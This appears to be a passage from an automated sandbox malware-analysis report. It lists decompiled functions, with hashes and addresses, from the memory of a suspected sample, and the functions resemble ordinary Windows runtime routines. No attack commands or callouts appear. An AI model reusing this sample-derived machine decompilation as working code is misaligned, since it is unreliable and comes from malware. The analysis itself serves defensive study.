                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bc26c9b849465c4b898c87c753cd224c8c2c72e00c3240351f82088918ca30c9
                    • Instruction ID: 4e878a055872c4be749957639061e26a6f136d1990e6a4d6915e6cb40fcf735d
                    • Opcode Fuzzy Hash: bc26c9b849465c4b898c87c753cd224c8c2c72e00c3240351f82088918ca30c9
                    • Instruction Fuzzy Hash: 7921A172501604ABC725DF69DC94EABBBE9EF48340F10466DF60AC7750D734E900CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168AE73 Relevance: .1, Instructions: 70COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E0168AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01687D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01687D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01687D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01687D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E016E7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                    0x0168ae78
                    0x0168ae7c
                    0x0168ae7e
                    0x0168ae81
                    0x0168ae86
                    0x0168ae8d
                    0x016d2691
                    0x0168ae93
                    0x0168ae93
                    0x0168ae93
                    0x0168ae98
                    0x0168ae9d
                    0x016d26a2
                    0x016d26b4
                    0x016d26a4
                    0x016d26ad
                    0x016d26ad
                    0x016d26b9
                    0x00000000
                    0x016d26bb
                    0x00000000
                    0x016d26bb
                    0x0168aea3
                    0x0168aea3
                    0x0168aea3
                    0x0168aeaa
                    0x016d26c0
                    0x016d26c9
                    0x016d26c9
                    0x0168aeb3
                    0x016d26d4
                    0x016d26e1
                    0x00000000
                    0x00000000
                    0x016d26e7
                    0x016d26ee
                    0x016d26f0
                    0x016d26f9
                    0x016d26f9
                    0x016d2702
                    0x016d2708
                    0x016d2708
                    0x016d270b
                    0x016d270f
                    0x016d2711
                    0x016d2711
                    0x016d2725
                    0x016d2725
                    0x00000000
                    0x0168aeb9
                    0x0168aeb9
                    0x0168aebf
                    0x0168aebf
                    0x0168aeb3

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                    • Instruction ID: f055571bf1de8dead7520b6425b551abeb06da7b91593d2d703afec92ab97bcf
                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                    • Instruction Fuzzy Hash: 1421F632A017C1DFEB26AB6DCD58B257BE9EF44740F1905A9ED048B792D734DC42C690
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169FD9B Relevance: .1, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E0169FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E016776E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                    0x0169fd9b
                    0x0169fda0
                    0x0169fda1
                    0x0169fdab
                    0x0169fdad
                    0x0169fdb0
                    0x0169fdb8
                    0x0169fe0f
                    0x0169fde6
                    0x0169fde9
                    0x0169fdec
                    0x016dc0c0
                    0x0169fdfe
                    0x0169fe06
                    0x0169fe06
                    0x016dc0c8
                    0x0169fe2d
                    0x0169fe2d
                    0x00000000
                    0x0169fe2d
                    0x016dc0d1
                    0x016dc0e0
                    0x016dc0e5
                    0x016dc0e5
                    0x016dc0e8
                    0x00000000
                    0x016dc0e8
                    0x0169fdf4
                    0x00000000
                    0x00000000
                    0x0169fdf6
                    0x0169fdfa
                    0x0169fe1a
                    0x0169fe1f
                    0x0169fe1f
                    0x0169fdfc
                    0x00000000
                    0x0169fdfc
                    0x0169fdcc
                    0x0169fdd0
                    0x0169fe26
                    0x00000000
                    0x0169fe26
                    0x0169fdd8
                    0x0169fddb
                    0x0169fddd
                    0x0169fde0
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                    • Instruction ID: 6a39a418f6f89ecf489c618e206fe1594852ca5881d2e04a0397e4eb51f15ed0
                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                    • Instruction Fuzzy Hash: E4217C72A00645DBDB31CF0DC940A66FBE9EB98A10F2681AEE955C7711D7319C01DB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169B390 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E0169B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01682280(_t12, 0x1758608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E016A00C2(0x1758608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                    0x0169b395
                    0x0169b3a2
                    0x0169b3a5
                    0x0169b3aa
                    0x0169b3b2
                    0x0169b3ba
                    0x0169b3bd
                    0x0169b3c0
                    0x0169b3c4
                    0x0169b3c9
                    0x016da3e9
                    0x016da3ed
                    0x016da3f0
                    0x016da3ff
                    0x016da403
                    0x016da409
                    0x00000000
                    0x00000000
                    0x016da40b
                    0x016da40b
                    0x016da40f
                    0x016da415
                    0x016da423
                    0x016da423
                    0x016da415
                    0x0169b3d1
                    0x0169b3e8
                    0x0169b3e8
                    0x0169b3d9

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77b81deea14cf8d7ea34b4f0b0cabe9ce9aff626ac4a8be1a89290ba70f66dee
                    • Instruction ID: 96df68058817391cb8d89c985b849d40afd14a7e1f43f9e22122a5a4d3624719
                    • Opcode Fuzzy Hash: 77b81deea14cf8d7ea34b4f0b0cabe9ce9aff626ac4a8be1a89290ba70f66dee
                    • Instruction Fuzzy Hash: 0B116B337091109FCF19DA599D81A2BB25BEBC5330B25423DDD26C7380CE71AC02C695
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01669240 Relevance: .1, Instructions: 63COMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E01669240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x173f708);
				E016BD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E016A95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E016A95D0();
				_t33 =  *0x17584c4; // 0x0
				L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x17584c4; // 0x0
				L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x17584c4; // 0x0
				E01682280(L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x17586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E016A95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E016A95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01669325();
					_t50 =  *0x17584c4; // 0x0
					return E016BD0D1(L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                    0x01669240
                    0x01669242
                    0x01669247
                    0x0166924c
                    0x0166924e
                    0x01669255
                    0x01669257
                    0x0166925a
                    0x0166925f
                    0x0166925f
                    0x01669266
                    0x01669271
                    0x01669276
                    0x01669279
                    0x0166927e
                    0x01669295
                    0x0166929a
                    0x016692b1
                    0x016692b6
                    0x016692d7
                    0x016692dc
                    0x016692e0
                    0x016692e6
                    0x016692e8
                    0x016692ee
                    0x01669332
                    0x01669333
                    0x01669337
                    0x01669338
                    0x0166933a
                    0x0166933a
                    0x0166933d
                    0x01669342
                    0x01669342
                    0x01669345
                    0x01669349
                    0x0166934e
                    0x01669352
                    0x01669357
                    0x016692f4
                    0x016692f4
                    0x016692f6
                    0x016692f9
                    0x01669300
                    0x01669306
                    0x01669324
                    0x01669324

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ee6865fa7df489e583733cf9017740136f5f4e545b4841d756a23ac1d77d1385
                    • Instruction ID: 1e8cd6317fefc78f2243389f91272690ac9a1f4c3c5f34b59bd9022e073b68dc
                    • Opcode Fuzzy Hash: ee6865fa7df489e583733cf9017740136f5f4e545b4841d756a23ac1d77d1385
                    • Instruction Fuzzy Hash: FE213671040641DFC722EF68CE40B59B7FABF18718F14456CE449966A2CB74E941CB48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016F4257 Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E016F4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x17408d0);
				E016BD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E016F41E8(__ebx, __edi, __ecx, _t39);
				E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x17587e4;
					_t18 =  *0x17587e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1755cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x17587e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x17587e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01667055(_t31 + 0xfffffff8);
								_t24 =  *0x17587e0; // 0x0
								_t18 = _t24 - 1;
								 *0x17587e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1755cd0;
				if( *0x1755cd0 <= 0) {
					L01667055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x17587e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x17587e8 = _t30;
						 *0x17587e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E016BD0D1(L016F4320());
			}















                    0x016f4257
                    0x016f4257
                    0x016f4257
                    0x016f4259
                    0x016f425e
                    0x016f4263
                    0x016f4265
                    0x016f4273
                    0x016f4278
                    0x016f427c
                    0x016f427f
                    0x016f4281
                    0x016f4287
                    0x016f42d7
                    0x016f42d7
                    0x016f42da
                    0x016f428d
                    0x016f428d
                    0x016f428f
                    0x016f4292
                    0x016f4297
                    0x016f429c
                    0x016f42a0
                    0x016f42a6
                    0x016f42a8
                    0x016f42ae
                    0x016f42b3
                    0x00000000
                    0x016f42ba
                    0x016f42ba
                    0x016f42bf
                    0x016f42c5
                    0x016f42ca
                    0x016f42cf
                    0x016f42d0
                    0x00000000
                    0x016f42d0
                    0x016f42b3
                    0x00000000
                    0x016f42a6
                    0x016f429c
                    0x016f42dc
                    0x016f42dc
                    0x016f42e3
                    0x016f4309
                    0x016f42e5
                    0x016f42e5
                    0x016f42e8
                    0x016f42ee
                    0x016f42f0
                    0x00000000
                    0x016f42f2
                    0x016f42f2
                    0x016f42f4
                    0x016f42f7
                    0x016f42f9
                    0x016f4300
                    0x016f4300
                    0x016f42f0
                    0x016f430e
                    0x016f431f

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8b2d5ec4630f05f28823409ced5d2c4ddd9fc93f29fceed2a81e36387da0d9a7
                    • Instruction ID: a8d32973b5cf969622acef6031f2eba9b8d787704baa87870cc346f217ef99df
                    • Opcode Fuzzy Hash: 8b2d5ec4630f05f28823409ced5d2c4ddd9fc93f29fceed2a81e36387da0d9a7
                    • Instruction Fuzzy Hash: 6521AC78500702CFC725DFAAD940A15BBF2FF85328B10C6AEC2058BB99DB71D492CB06
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01692397 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    C-Code - Quality: 29%
                    			E01692397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x175848c != 0) {
					L0168FAD0(0x1758610);
					if( *0x175848c == 0) {
						E0168FA00(0x1758610, _t19, _t27, 0x1758610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01692581(0x1758610, 0x16450a0, _t26, _t27, _t28);
						E0168FA00(0x1758610, 0x16450a0, _t27, 0x1758610);
					}
				} else {
					L1:
					_t11 =  *0x1758614; // 0x0
					if(_t11 == 0) {
						_t11 = E016A4886(0x1641088, 1, 0x1758614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01692581(0x1758610, (_t11 << 4) + 0x1645070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                    0x016923b0
                    0x016923b6
                    0x01692409
                    0x01692415
                    0x016d5ae9
                    0x00000000
                    0x0169241b
                    0x0169241b
                    0x0169241d
                    0x01692427
                    0x0169242e
                    0x01692430
                    0x01692430
                    0x016923b8
                    0x016923b8
                    0x016923b8
                    0x016923bf
                    0x016923fc
                    0x016923fc
                    0x016923c1
                    0x016923c3
                    0x016923d0
                    0x016923d8
                    0x016923d8
                    0x016923dc
                    0x016923de
                    0x016923e1
                    0x016923e1
                    0x016923ec

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5dec6f9953da35fe783faf2d48d47d52292ac8319457bc5441f25e7a75fecd5d
                    • Instruction ID: 658312b27c4046c8532690cdd4cb0cc582198b4e2d9945ae7b1620f999c93702
                    • Opcode Fuzzy Hash: 5dec6f9953da35fe783faf2d48d47d52292ac8319457bc5441f25e7a75fecd5d
                    • Instruction Fuzzy Hash: 2711DF71744311B7EB30AA2A9C90B15B79DFB60760F14455EFE02D7251C6F0D841C799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E46A7 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E016E46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E016AF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0169D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L016877F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                    0x016e46b7
                    0x016e46ba
                    0x016e46c5
                    0x016e46c8
                    0x016e46d0
                    0x016e46d4
                    0x016e46e6
                    0x016e46e9
                    0x016e46f4
                    0x016e46ff
                    0x016e4705
                    0x016e4706
                    0x016e470c
                    0x016e4713
                    0x016e471b
                    0x016e4723
                    0x016e4725
                    0x016e46d6
                    0x016e46d9
                    0x016e46db
                    0x016e46db
                    0x016e4732

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                    • Instruction ID: 901204dd22f59c4e8df4b833bb5e2d9afd2f7212539e006c12003427ac80aa4a
                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                    • Instruction Fuzzy Hash: D311E572504208BBCB05AF6CDC809BEBBB9EF95314F1081AEF944C7351DA318D55D7A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166C962 Relevance: .1, Instructions: 57COMMON
                    Download Yara Rule
                    C-Code - Quality: 42%
                    			E0166C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x175d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0167EEF0(0x17570a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E016EF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0167EB70(_t29, 0x17570a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E016AB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E016EF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x17570c0; // 0x0
					while(_t38 != 0x17570c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x175b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                    0x0166c96a
                    0x0166c974
                    0x0166c988
                    0x0166c98a
                    0x016d7c9d
                    0x016d7c9f
                    0x016d7ca4
                    0x016d7cae
                    0x016d7cf0
                    0x016d7cf5
                    0x016d7cfa
                    0x0166c992
                    0x0166c996
                    0x0166c997
                    0x0166c998
                    0x0166c9a3
                    0x0166c9a3
                    0x016d7cb0
                    0x016d7cb7
                    0x016d7cbb
                    0x00000000
                    0x00000000
                    0x016d7cbd
                    0x016d7ce8
                    0x016d7cc5
                    0x016d7cc8
                    0x016d7cca
                    0x016d7cd0
                    0x016d7cd6
                    0x016d7cde
                    0x016d7ce4
                    0x016d7ce4
                    0x016d7cd0
                    0x00000000
                    0x016d7ce8
                    0x0166c990
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1874ad5ec1a3fce4bdb113f7465f14cd2e14d71b348f323931f493272647f64
                    • Instruction ID: 5247d286b61c18f62a85e79163d31e7eaf101fcb8ba404790fffc835f6429fae
                    • Opcode Fuzzy Hash: e1874ad5ec1a3fce4bdb113f7465f14cd2e14d71b348f323931f493272647f64
                    • Instruction Fuzzy Hash: 6111E1327007169FC764AF6CDC95A2BBBE6BB84618B40066DE94583651DF70EC14CBD2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A37F5 Relevance: .1, Instructions: 57COMMON
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E016A37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01682280(_t6, 0x1758550);
				}
				_t29 = E016A387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0167FFB0(0x1758550, _t27, 0x1758550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                    0x016a37fa
                    0x016a37fc
                    0x016a3805
                    0x016a3808
                    0x016a3808
                    0x016a3814
                    0x016a3818
                    0x016a3846
                    0x016a3848
                    0x016a384b
                    0x016a384b
                    0x016a3852
                    0x00000000
                    0x016a3854
                    0x016a3856
                    0x00000000
                    0x00000000
                    0x016a3863
                    0x00000000
                    0x016a3863
                    0x016a381a
                    0x016a381a
                    0x016a381f
                    0x016a386e
                    0x016a386e
                    0x016a3871
                    0x016a3873
                    0x016a3873
                    0x016a3868
                    0x00000000
                    0x016a3868
                    0x016a3821
                    0x016a3826
                    0x00000000
                    0x00000000
                    0x016a3828
                    0x016a382a
                    0x016a3841
                    0x00000000
                    0x016a3841

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
